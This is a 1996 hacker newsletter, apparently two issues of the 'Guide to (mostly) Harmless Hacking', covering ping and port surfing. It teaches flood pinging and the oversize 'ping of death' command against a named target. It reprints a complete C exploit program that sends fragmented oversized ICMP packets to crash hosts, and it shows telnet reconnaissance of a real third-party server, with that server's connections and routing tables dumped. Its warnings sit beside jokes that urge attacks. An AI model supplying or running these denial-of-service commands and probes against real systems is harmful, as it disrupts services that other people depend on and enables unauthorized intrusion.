A packet is a way to send information electronically that keeps out errors. The idea is that no transmission technology is perfect. Have you ever played the game "telephone"? You get a dozen or so people in a circle and the first person whispers a message to the second. Something like "The bun is the lowest form of wheat." The second person whispers to the third, "A bum is the lowest form of cheating." The third whispers, "Rum is the lowest form of
drinking." And so on. It's really fun to find out how far the message can mutate as it goes around the circle.
But when, for example, you get email, you would prefer that it isn't messed up. So the computer that sends the email breaks it up into little pieces called datagrams. Then it wraps things around each datagram that tell what
computer it needs to go to, where it came from, and that check whether the datagram might have been garbled. These wrapped up datagram packages are called "packets."
Now if the computer sending email to you were to package a really long message into just one packet, chances are pretty high that it will get messed up while on its way to the other computer. Bit burps. So when the receiving computer checks the packet and finds that it got messed up, it
will throw it away and tell the other computer to send it again. It could take a long time until this giant packet gets through intact.
But if the message is broken into a lot of little pieces and wrapped up into bunches of packets, most of them will be good and the receiving computer will keep them. It will then tell the sending computer to retransmit just the packets that messed up. Then when all the pieces finally get there, the receiving computer puts them together in the right order and lo and behold, there is the complete, error-free email.
TCP/IP stands for Transmission Control Protocol/Internet Protocol. It tells computers that are hooked up to the Internet how to package up messages into packets and how to read packets these packets from other computers. Ping uses TCP/IP to make its packets.
**********************************************
"Ping" is a command that sends a feeler out from your computer to another computer to see if it is turned on and hooked to the same network you are on. On the Internet there are some ten million computers that you can ping.
Ping is a command you can give, for example, from the Unix, Windows 95 and Windows NT operating systems. It is part of the Internet Control Message Protocol (ICMP), which is used to troubleshoot TCP/IP networks. What it does is tell a remote computer to echo back a ping. So if you get your ping
back, you know that computer is alive. Furthermore, some forms of the ping command will also tell you how long it takes for a message to go out to that computer and come back again.
But how does your computer know that the ping it just sent out actually echoed back from the targeted computer? The datagram is the answer. The ping sent out a datagram. If the returning ping holds this same datagram, you know it was your ping that just echoed back.
The basic format of this command is simply:
ping hostname
where "hostname" is the Internet address of the computer you want to check out.
When I give this command from Sun Release 4.1 Unix, I get the answer "hostname is alive."
**************************************
TECHNICAL TIP: Because of the destructive powers of ping, many Internet Service Providers hide the ping program in their shell accounts where clueless newbies can't get their hands on it. If your shell account says "command not found" when you enter the ping command, try:
/usr/etc/ping hostname
If this doesn't work, either try the command “whereis ping” or complain to your ISP's tech support. They may have ddiabled ping for ordinary users, but if you convince tech support you are a good Internet citizen they may let you use it.
***************************************
****************************************
NEWBIE NOTE: You say you can't find a way to ping from your on-line service? That may be because you don't have a shell account. But there is one thing you really need in order to hack: A SHELL ACCOUNT!!!!
The reason hackers make fun of people with America Online accounts is because that ISP doesn't give out shell accounts. This is because America Online wants you to be good boys and girls and not hack!
A "shell account" is an Internet account in which your computer becomes a terminal of one of your ISP's host computers. Once you are in the "shell" you can give commands to the operating system (which is usually Unix) just
like you were sitting there at the console of one of your ISP's hosts.
You may already have a shell account but just not know how to log on to it. Call tech support with your ISP to find out whether you have one, and how to get on it.
***************************************
There are all sorts of fancy variations on the ping command. And, guess what, whenever there is a command you give over the Internet that has lots of variations, you can just about count on there being something hackable in there. Muhahaha!
The flood ping is a simple example. If your operating system will let you get away with giving the command:
-> ping -f hostname
it sends out a veritable flood of pings, as fast as your ISP's host machine can make them. This keeps the host you've targeted so busy echoing back your pings that it can do little else. It also puts a heavy load on the network.
Hackers with primitive skill levels will sometimes get together and use several of their computers at once to simultaneously ping some victim's Internet host computer. This will generally keep the victim's computer too
busy to do anything else. It may even crash. However, the down side (from the attackers' viewpoint) is that it keeps the attackers' computers tied up, too.
**************************************
NETIQUETTE NOTE: Flood pinging a computer is extremely rude. Get caught doing this and you will be lucky if the worst that happens is your on-line service provider closes your account. Do this to a serious hacker and you may need an identity transplant.
If you should start a flood ping kind of by accident, you can shut it off by holding down the control key and pressing "c" (control-c).
**************************************
*************************************
EVIL GENIUS TIP: Ping yourself! If you are using some sort of Unix, your operating system will let you use your computer to do just about anything to itself that it can do to other computers. The network address that takes you
back to your own host computer is localhost (or 127.0.0.1). Here's an example of how I use localhost:
[65] ->telnet localhost
Trying 127.0.0.1 ...
Connected to localhost.
Escape character is '^]'.
SunOS UNIX (slug)
login:
See, I'm back to the login sequence for the computer named "slug" all over
again.
Now I ping myself:
[68] ->/usr/etc/ping localhost
localhost is alive
This gives the same result as if I were to command:
[69] ->/usr/etc/ping llama
llama.swcp.com is alive
****************************************
*****************************************
MUHAHAHA TIP: Want to yank someone's chain? Tell him to ftp to 127.0.0.1 and log in using his or her own user name and password for kewl warez! My ex-husband Keith Henson did that to the Church of Scientology. The COGs ftp-ed to 127.0.0.1 and discovered all their copyrighted scriptures. They
assumed this was on Keith's computer, not theirs. They were *so* sure he had their scriptures that they took him to court. The judge, when he realized they were simply looping back to their own computer, literally laughed them out of court.
For a hilarious transcript or audio tape of this infamous court session, email hkhenson@cup.portal.com. That's Keith's email address. My hat is off to a superb hacker!
*******************************************
However, the oversize ping packet exploit you are about to learn will do even more damage to some hosts than a gang of flood ping conspirators. And it will do it without tying up the attackers' computer for any longer than the split second it takes to send out just one ping.
The easiest way to do this hack is to run Windows 95. Don't have it? You can generally find a El Cheapo store that will sell it to you for $99.
To do this, first set up your Windows 95 system so that you can make a PPP or SLIP connection with the Internet using the Dialup Networking program under the My Computer icon. You may need some help from your ISP tech support in setting this up. You must do it this way or this hack won't work. Your America Online dialer *definitely* will not work.
************************************
NEWBIE NOTE: If your Internet connection allows you to run a Web browser that shows pictures, you can use that dialup number with your Windows 95 Dialup Networking program to get either a PPP or SLIP connection.
************************************
Next, get your connected to the Internet. But don't run a browser or anything. Instead, once your Dialup Networking program tell you that you have a connection, click on the "Start" button and go to the listing "MS-DOS." Open this DOS window. You'll get a prompt:
C:\windows\>
Now let's first do this the good citizen way. At this prompt you can type in a plain ordinary "ping" command:
C:\windows\ping hostname
where "hostname" is the address of some Internet computer. For example, you could ping thales.nmia.com, which is one of my favorite computers, named after an obscure Greek philosopher.
Now if you happened to know the address of one of Saddam Hussein's computers, however, you might want to give the command:
c:\windows\ping -l 65510 saddam_hussein's.computer.mil
Now don't really do this to a real computer! Some, but not all, computers will crash and either remain hung or reboot when they get this ping. Others will continue working cheerily along, and then suddenly go under hours later.
Why? That extra added -l 65510 creates a giant datagram for the ping packet. Some computers, when asked to send back an identical datagram, get really messed up.
If you want all the gory details on this ping exploit, including how to protect your computers from it, check out
http://www.sophist.demon.co.uk/ping.
Now there are other ways to manufacture a giant ping datagram besides using Windows 95. For example, if you run certain FreeBSD or Linux versions of Unix on your PC, you can run this program, which was posted to the Bugtraq list.
From: Bill Fenner
To: Multiple recipients of list BUGTRAQ
Subject: Ping exploit program
Since some people don't necessarily have Windows '95 boxes lying around, I (Fenner) wrote the following exploit program. It requires a raw socket layer that doesn't mess with the packet, so BSD 4.3, SunOS and Solaris are
out. It works fine on 4.4BSD systems. It should work on Linux if you compile with -DREALLY_RAW.
Feel free to do with this what you want. Please use this tool only to test your own machines, and not to crash others'.
* win95ping.c
*
* Simulate the evil win95 "ping -l 65510 buggyhost".
* version 1.0 Bill Fenner 22-Oct-1996
*
* This requires raw sockets that don't mess with the packet at all (other
* than adding the checksum). That means that SunOS, Solaris, and
* BSD4.3-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
* system to try it on.
*
* The attack from the Win95 box looks like:
* 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)
* 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
* 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
* 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
* 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
* 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
* 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+
* 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
* 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
* 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
* 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
* 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
* 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
* 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
* 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
* 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
* 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
* 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
* 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
* 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
* 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
* 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
* 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
* 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
* 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
* 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
* 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
* 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
* 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
* 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
* 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
* 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
* 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
* 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
* 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
* 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
* 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
* 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
* 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
* 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
* 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
* 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
* 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
* 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
* 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
/*
* If your kernel doesn't muck with raw packets, #define REALLY_RAW.
* This is probably only Linux.
*/
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
int
main(int argc, char **argv)
{
int s;
char buf[1500];
struct ip *ip = (struct ip *)buf;
struct icmp *icmp = (struct icmp *)(ip + 1);
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = 1;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(1);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(1);
}
if ((hp = gethostbyname(argv[1])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof buf);
ip->ip_id = htons(4321);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* kernel fills in */
ip->ip_src.s_addr = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = FIX(offset >> 3);
if (offset < 65120)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
}
(End of Fenner's ping exploit message.)
********************************************
YOU CAN GO TO JAIL NOTE: Not only is this hack not elite, if you are reading this you don't know enough to keep from getting busted from doing this ping hack. On the other hand, if you were to do it to an Internet host in Iraq...
********************************************
Of course there are many other kewl things you can do with ping. If you have a shell account, you can find out lots of stuph about ping by giving the command:
man ping
In fact, you can get lots of details on any Unix command with "man."
Have fun with ping -- and be good! But remember, I'm not begging the evil genius wannabes to be good. See if I care when you get busted...
_________________________________________________________
To subscribe, email hacker@techbroker.com with message “subscribe hh.” To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 4
More intro to TCP/IP: port surfing! Daemons! How to get on almost any computer without logging in and without breaking the law. Impress your clueless friends and actually discover kewl, legal, safe stuph.
____________________________________________________________
A few days ago I had a lady friend visiting. She’s 42 and doesn’t own a computer. However, she is taking a class on personal computers at a community college. She wanted to know what all this hacking stuph is about. So I decided to introduce her to port surfing. And while doing it, we stumbled across something kewl.
Port surfing takes advantage of the structure of TCP/IP. This is the protocol (set of rules) used for computers to talk to each other over the Internet. One of the basic principles of Unix (the most popular operating system on the Internet) is to assign a “port” to every function that one computer might command another to perform. Common examples are to send and receive email, read Usenet newsgroups, telnet, transfer files, and offer Web pages.
************************
Newbie note #1: A computer port is a place where information goes in or out of it. On your home computer, examples of ports are your monitor, which sends information out, your keyboard and mouse, which send information in, and your modem, which sends information both out and in.
But an Internet host computer such as callisto.unm.edu has many more ports than a typical home computer. These ports are identified by numbers. Now these are not all physical ports, like a keyboard or RS232 serial port (for your modem). They are virtual (software) ports.
A “service” is a program running on a “port.” When you telnet to a port, that program is up and running, just waiting for your input. Happy hacking!
************************
So if you want to read a Web page, your browser contacts port number 80 and tells the computer that manages that Web site to let you in. And, sure enough, you get into that Web server computer without a password.
OK, big deal. That’s pretty standard for the Internet. Many -- most -- computers on the Internet will let you do some things with them without needing a password,
However, the essence of hacking is doing things that aren’t obvious. That don’t just jump out at you from the manuals. One way you can move a step up from the run of the mill computer user is to learn how to port surf.
The essence of port surfing is to pick out a target computer and explore it to see what ports are open and what you can do with them.
Now if you are a lazy hacker you can use canned hacker tools such as Satan or Netcat. These are programs you can run from Linux, FreeBSD or Solaris (all types of Unix) from your PC. They automatically scan your target computers. They will tell you what ports are in use. They will also probe these ports for presence of daemons with know security flaws, and tell you what they are.
********************************
Newbie note # 2: A daemon is not some sort of grinch or gremlin or 666 guy. It is a program that runs in the background on many (but not all) Unix system ports. It waits for you to come along and use it. If you find a daemon on a port, it’s probably hackable. Some hacker tools will tell you what the hackable features are of the daemons they detect.
********************************
However, there are several reasons to surf ports by hand instead of automatically.
1) You will learn something. Probing manually you get a gut feel for how the daemon running on that port behaves. It’s the difference between watching an x-rated movie and (blush).
2) You can impress your friends. If you run a canned hacker tool like Satan your friends will look at you and say, “Big deal. I can run programs, too.” They will immediately catch on to the dirty little secret of the hacker world. Most hacking exploits are just lamerz running programs they picked up from some BBS or ftp site. But if you enter commands keystroke by keystroke they will see you using your brain. And you can help them play with daemons, too, and give them a giant rush.
3) The truly elite hackers surf ports and play with daemons by hand because it is the only way to discover something new. There are only a few hundred hackers -- at most -- who discover new stuph. The rest just run canned exploits over and over and over again. Boring. But I am teaching you how to reach the pinnacle of hackerdom.
Now let me tell you what my middle aged friend and I discovered just messing around. First, we decided we didn’t want to waste our time messing with some minor little host computer. Hey, let’s go for the big time!
So how do you find a big kahuna computer on the Internet? We started with a domain which consisted of a LAN of PCs running Linux that I happened to already know about, that is used by the New Mexico Internet Access ISP: nmia.com.
*****************************
Newbie Note # 3: A domain is an Internet address. You can use it to look up who runs the computers used by the domain, and also to look up how that domain is connected to the rest of the Internet.
*****************************
So to do this we first logged into my shell account with Southwest Cyberport. I gave the command:
[66] ->whois nmia.com
New Mexico Internet Access (NMIA-DOM)
2201 Buena Vista SE
Albuquerque, NM 87106
Domain Name: NMIA.COM
Administrative Contact, Technical Contact, Zone Contact:
Orrell, Stan (SO11) SAO@NMIA.COM
(505) 877-0617
Record last updated on 11-Mar-94.
Record created on 11-Mar-94.
Domain servers in listed order:
NS.NMIA.COM 198.59.166.10
GRANDE.NM.ORG 129.121.1.2
Now it’s a good bet that grande.nm.org is serving a lot of other Internet hosts beside nmia.com. Here’s how we port surf our way to find this out:
[67] ->telnet grande.nm.org 15
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1
Product License Authorization Expiration Date
---------- ------- ------------- ---------------
MULTINET Yes A-137-1641 (none)
NFS-CLIENT Yes A-137-113237 (none)
*** Configuration for file "MULTINET:NETWORK_DEVICES.CONFIGURATION" ***
Device Adapter CSR Address Flags/Vector
------ ------- ----------- ------------
se0 (Shared VMS Ethernet/FDDI) -NONE- -NONE- -NONE-
MultiNet Active Connections, including servers:
Proto Rcv-Q Snd-Q Local Address (Port) Foreign Address (Port) State
----- ----- ----- ------------------ ------------------ -----
TCP 0 822 GRANDE.NM.ORG(NETSTAT) 198.59.115.24(1569) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(POP3) 164.64.201.67(1256) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4918) 129.121.254.5(TELNET) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(TELNET) AVATAR.NM.ORG(3141) ESTABLISHED
TCP 0 0 *(NAMESERVICE) *(*) LISTEN
TCP 0 0 *(TELNET) *(*) LISTEN
TCP 0 0 *(FTP) *(*) LISTEN
TCP 0 0 *(FINGER) *(*) LISTEN
TCP 0 0 *(NETSTAT) *(*) LISTEN
TCP 0 0 *(SMTP) *(*) LISTEN
TCP 0 0 *(LOGIN) *(*) LISTEN
TCP 0 0 *(SHELL) *(*) LISTEN
TCP 0 0 *(EXEC) *(*) LISTEN
TCP 0 0 *(RPC) *(*) LISTEN
TCP 0 0 *(NETCONTROL) *(*) LISTEN
TCP 0 0 *(SYSTAT) *(*) LISTEN
TCP 0 0 *(CHARGEN) *(*) LISTEN
TCP 0 0 *(DAYTIME) *(*) LISTEN
TCP 0 0 *(TIME) *(*) LISTEN
TCP 0 0 *(ECHO) *(*) LISTEN
TCP 0 0 *(DISCARD) *(*) LISTEN
TCP 0 0 *(PRINTER) *(*) LISTEN
TCP 0 0 *(POP2) *(*) LISTEN
TCP 0 0 *(POP3) *(*) LISTEN
TCP 0 0 *(KERBEROS_MASTER) *(*) LISTEN
TCP 0 0 *(KLOGIN) *(*) LISTEN
TCP 0 0 *(KSHELL) *(*) LISTEN
TCP 0 0 GRANDE.NM.ORG(4174) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4172) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4171) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 *(FS) *(*) LISTEN
UDP 0 0 *(NAMESERVICE) *(*)
UDP 0 0 127.0.0.1(NAMESERVICE) *(*)
UDP 0 0 GRANDE.NM.OR(NAMESERV) *(*)
UDP 0 0 *(TFTP) *(*)
UDP 0 0 *(BOOTPS) *(*)
UDP 0 0 *(KERBEROS) *(*)
UDP 0 0 127.0.0.1(KERBEROS) *(*)
UDP 0 0 GRANDE.NM.OR(KERBEROS) *(*)
UDP 0 0 *(*) *(*)
UDP 0 0 *(SNMP) *(*)
UDP 0 0 *(RPC) *(*)
UDP 0 0 *(DAYTIME) *(*)
UDP 0 0 *(ECHO) *(*)
UDP 0 0 *(DISCARD) *(*)
UDP 0 0 *(TIME) *(*)
UDP 0 0 *(CHARGEN) *(*)
UDP 0 0 *(TALK) *(*)
UDP 0 0 *(NTALK) *(*)
UDP 0 0 *(1023) *(*)
UDP 0 0 *(XDMCP) *(*)
MultiNet registered RPC programs:
Program Version Protocol Port
------- ------- -------- ----
PORTMAP 2 TCP 111
PORTMAP 2 UDP 111
MultiNet IP Routing tables:
Destination Gateway Flags Refcnt Use Interface MTU
---------- ---------- ----- ------ ----- --------- ----
198.59.167.1 LAWRII.NM.ORG Up,Gateway,H 0 2 se0 1500
166.45.0.1 ENSS365.NM.ORG Up,Gateway,H 0 4162 se0 1500
205.138.138.1 ENSS365.NM.ORG Up,Gateway,H 0 71 se0 1500
204.127.160.1 ENSS365.NM.ORG Up,Gateway,H 0 298 se0 1500
127.0.0.1 127.0.0.1 Up,Host 5 1183513 lo0 4136
198.59.167.2 LAWRII.NM.ORG Up,Gateway,H 0 640 se0 1500
192.132.89.2 ENSS365.NM.ORG Up,Gateway,H 0 729 se0 1500
207.77.56.2 ENSS365.NM.ORG Up,Gateway,H 0 5 se0 1500
204.97.213.2 ENSS365.NM.ORG Up,Gateway,H 0 2641 se0 1500
194.90.74.66 ENSS365.NM.ORG Up,Gateway,H 0 1 se0 1500
204.252.102.2 ENSS365.NM.ORG Up,Gateway,H 0 109 se0 1500
205.160.243.2 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500
202.213.4.2 ENSS365.NM.ORG Up,Gateway,H 0 4 se0 1500
202.216.224.66 ENSS365.NM.ORG Up,Gateway,H 0 113 se0 1500
192.132.89.3 ENSS365.NM.ORG Up,Gateway,H 0 1100 se0 1500
198.203.196.67 ENSS365.NM.ORG Up,Gateway,H 0 385 se0 1500
160.205.13.3 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500
202.247.107.131 ENSS365.NM.ORG Up,Gateway,H 0 19 se0 1500
198.59.167.4 LAWRII.NM.ORG Up,Gateway,H 0 82 se0 1500
128.148.157.6 ENSS365.NM.ORG Up,Gateway,H 0 198 se0 1500
160.45.10.6 ENSS365.NM.ORG Up,Gateway,H 0 3 se0 1500
128.121.50.7 ENSS365.NM.ORG Up,Gateway,H 0 3052 se0 1500
206.170.113.8 ENSS365.NM.ORG Up,Gateway,H 0 1451 se0 1500
128.148.128.9 ENSS365.NM.ORG Up,Gateway,H 0 1122 se0 1500
203.7.132.9 ENSS365.NM.ORG Up,Gateway,H 0 14 se0 1500
204.216.57.10 ENSS365.NM.ORG Up,Gateway,H 0 180 se0 1500
130.74.1.75 ENSS365.NM.ORG Up,Gateway,H 0 10117 se0 1500
206.68.65.15 ENSS365.NM.ORG Up,Gateway,H 0 249 se0 1500
129.219.13.81 ENSS365.NM.ORG Up,Gateway,H 0 547 se0 1500
204.255.246.18 ENSS365.NM.ORG Up,Gateway,H 0 1125 se0 1500
160.45.24.21 ENSS365.NM.ORG Up,Gateway,H 0 97 se0 1500
206.28.168.21 ENSS365.NM.ORG Up,Gateway,H 0 2093 se0 1500
163.179.3.222 ENSS365.NM.ORG Up,Gateway,H 0 315 se0 1500
198.109.130.33 ENSS365.NM.ORG Up,Gateway,H 0 1825 se0 1500
199.224.108.33 ENSS365.NM.ORG Up,Gateway,H 0 11362 se0 1500
203.7.132.98 ENSS365.NM.ORG Up,Gateway,H 0 73 se0 1500
198.111.253.35 ENSS365.NM.ORG Up,Gateway,H 0 1134 se0 1500
206.149.24.100 ENSS365.NM.ORG Up,Gateway,H 0 3397 se0 1500
165.212.105.106 ENSS365.NM.ORG Up,Gateway,H 0 17 se0 1006
205.238.3.241 ENSS365.NM.ORG Up,Gateway,H 0 69 se0 1500
198.49.44.242 ENSS365.NM.ORG Up,Gateway,H 0 25 se0 1500
194.22.188.242 ENSS365.NM.ORG Up,Gateway,H 0 20 se0 1500
164.64.0 LAWRII.NM.ORG Up,Gateway 1 40377 se0 1500
0.0.0 ENSS365.NM.ORG Up,Gateway 2 4728741 se0 1500
207.66.1 GLORY.NM.ORG Up,Gateway 0 51 se0 1500
205.166.1 GLORY.NM.ORG Up,Gateway 0 1978 se0 1500
204.134.1 LAWRII.NM.ORG Up,Gateway 0 54 se0 1500
204.134.2 GLORY.NM.ORG Up,Gateway 0 138 se0 1500
192.132.2 129.121.248.1 Up,Gateway 0 6345 se0 1500
204.134.67 GLORY.NM.ORG Up,Gateway 0 2022 se0 1500
206.206.67 GLORY.NM.ORG Up,Gateway 0 7778 se0 1500
206.206.68 LAWRII.NM.ORG Up,Gateway 0 3185 se0 1500
207.66.5 GLORY.NM.ORG Up,Gateway 0 626 se0 1500
204.134.69 GLORY.NM.ORG Up,Gateway 0 7990 se0 1500
207.66.6 GLORY.NM.ORG Up,Gateway 0 53 se0 1500
204.134.70 LAWRII.NM.ORG Up,Gateway 0 18011 se0 1500
192.188.135 GLORY.NM.ORG Up,Gateway 0 5 se0 1500
206.206.71 LAWRII.NM.ORG Up,Gateway 0 2 se0 1500
204.134.7 GLORY.NM.ORG Up,Gateway 0 38 se0 1500
199.89.135 GLORY.NM.ORG Up,Gateway 0 99 se0 1500
198.59.136 LAWRII.NM.ORG Up,Gateway 0 1293 se0 1500
204.134.9 GLORY.NM.ORG Up,Gateway 0 21 se0 1500
204.134.73 GLORY.NM.ORG Up,Gateway 0 59794 se0 1500
129.138.0 GLORY.NM.ORG Up,Gateway 0 5262 se0 1500
192.92.10 LAWRII.NM.ORG Up,Gateway 0 163 se0 1500
206.206.75 LAWRII.NM.ORG Up,Gateway 0 604 se0 1500
207.66.13 GLORY.NM.ORG Up,Gateway 0 1184 se0 1500
204.134.77 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500
207.66.14 GLORY.NM.ORG Up,Gateway 0 334 se0 1500
204.134.78 GLORY.NM.ORG Up,Gateway 0 239 se0 1500
204.52.207 GLORY.NM.ORG Up,Gateway 0 293 se0 1500
204.134.79 GLORY.NM.ORG Up,Gateway 0 1294 se0 1500
192.160.144 LAWRII.NM.ORG Up,Gateway 0 117 se0 1500
206.206.80 PENNY.NM.ORG Up,Gateway 0 4663 se0 1500
204.134.80 GLORY.NM.ORG Up,Gateway 0 91 se0 1500
198.99.209 LAWRII.NM.ORG Up,Gateway 0 1136 se0 1500
207.66.17 GLORY.NM.ORG Up,Gateway 0 24173 se0 1500
204.134.82 GLORY.NM.ORG Up,Gateway 0 29766 se0 1500
192.41.211 GLORY.NM.ORG Up,Gateway 0 155 se0 1500
192.189.147 LAWRII.NM.ORG Up,Gateway 0 3133 se0 1500
204.134.84 PENNY.NM.ORG Up,Gateway 0 189 se0 1500
204.134.87 LAWRII.NM.ORG Up,Gateway 0 94 se0 1500
146.88.0 GLORY.NM.ORG Up,Gateway 0 140 se0 1500
192.84.24 GLORY.NM.ORG Up,Gateway 0 3530 se0 1500
204.134.88 LAWRII.NM.ORG Up,Gateway 0 136 se0 1500
198.49.217 GLORY.NM.ORG Up,Gateway 0 303 se0 1500
192.132.89 GLORY.NM.ORG Up,Gateway 0 3513 se0 1500
198.176.219 GLORY.NM.ORG Up,Gateway 0 1278 se0 1500
206.206.92 LAWRII.NM.ORG Up,Gateway 0 1228 se0 1500
192.234.220 129.121.1.91 Up,Gateway 0 2337 se0 1500
204.134.92 LAWRII.NM.ORG Up,Gateway 0 13995 se0 1500
198.59.157 LAWRII.NM.ORG Up,Gateway 0 508 se0 1500
206.206.93 GLORY.NM.ORG Up,Gateway 0 635 se0 1500
204.134.93 GLORY.NM.ORG Up,Gateway 0 907 se0 1500
198.59.158 LAWRII.NM.ORG Up,Gateway 0 14214 se0 1500
198.59.159 LAWRII.NM.ORG Up,Gateway 0 1806 se0 1500
204.134.95 PENNY.NM.ORG Up,Gateway 0 3644 se0 1500
206.206.96 GLORY.NM.ORG Up,Gateway 0 990 se0 1500
206.206.161 LAWRII.NM.ORG Up,Gateway 0 528 se0 1500
198.59.97 PENNY.NM.ORG Up,Gateway 0 55 se0 1500
198.59.161 LAWRII.NM.ORG Up,Gateway 0 497 se0 1500
192.207.226 GLORY.NM.ORG Up,Gateway 0 93217 se0 1500
198.59.99 PENNY.NM.ORG Up,Gateway 0 2 se0 1500
198.59.163 GLORY.NM.ORG Up,Gateway 0 3379 se0 1500
192.133.100 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500
204.134.100 GLORY.NM.ORG Up,Gateway 0 8 se0 1500
128.165.0 PENNY.NM.ORG Up,Gateway 0 15851 se0 1500
198.59.165 GLORY.NM.ORG Up,Gateway 0 274 se0 1500
206.206.165 LAWRII.NM.ORG Up,Gateway 0 167 se0 1500
206.206.102 GLORY.NM.ORG Up,Gateway 0 5316 se0 1500
160.230.0 LAWRII.NM.ORG Up,Gateway 0 19408 se0 1500
206.206.166 LAWRII.NM.ORG Up,Gateway 0 1756 se0 1500
205.166.231 GLORY.NM.ORG Up,Gateway 0 324 se0 1500
198.59.167 GLORY.NM.ORG Up,Gateway 0 1568 se0 1500
